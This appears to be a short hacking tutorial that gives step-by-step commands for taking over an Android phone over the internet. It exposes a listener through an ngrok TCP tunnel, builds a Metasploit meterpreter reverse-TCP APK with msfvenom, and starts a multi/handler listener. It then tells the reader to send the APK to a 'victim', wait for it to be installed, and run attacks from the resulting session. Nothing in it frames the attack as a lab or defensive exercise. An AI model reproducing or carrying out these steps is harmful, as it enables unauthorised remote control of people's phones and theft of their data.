How to Hack an android device over WAN??
Hack an android device over WAN, Metasploit

Step 1: Load Up Your Kali Shell
Load up your Kali Linux ShellStep 2: Download NGROK TCP Tunneling
It can be found here: https://ngrok.com/download. Download the correct architecture for your device.(This can be found by running 'uname -m')
Then unzip the file with:
unzip "/path-to-ngrok.zip"
Step 3: Sign Up
The sign-up page can be found here: https://ngrok.com/signup. Then run the command to activate your AuthTokenStep 4: Start an NGROK TCP Server and POSTGRESQL
We can do this with the following commandsudo service postgresql startThis will start a TCP server on port 4444
./ngrok tcp 4444

Step 5: Make an MSF Payload
First of all, we need to ping the IP of the NGROK TCP site with the following commandping 0.tcp.ngrok.ioNext, we have to generate a Metasploit APK Payload with the following command
msfvenom -p android/meterpreter/reverse_tcp LHOST=<ngrok ip> LPORT=<port displayed in ngrok> R
> (name of file).apk
Step 6: Start a Listener
Once the Payload is generated we can start a listener. There should be an apk file ready for you to send now.We can start a listener with this command:
msfconsole

Step 7: Configure the Listener
To start the payload listener, we must now enter these commands:msf > use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Step 8: Send the Payload
Now we must send the payload to the target, I have transferred the file to my android for these purposesWe need to wait for the victim to install the file.
Step 9: ATTACK!
Now we have access to the android device. Type:sessionsWe can now do many different attacks on the android phone, type
sessions 1
help
to see a variety of attacks to perform
Happy Hacking!






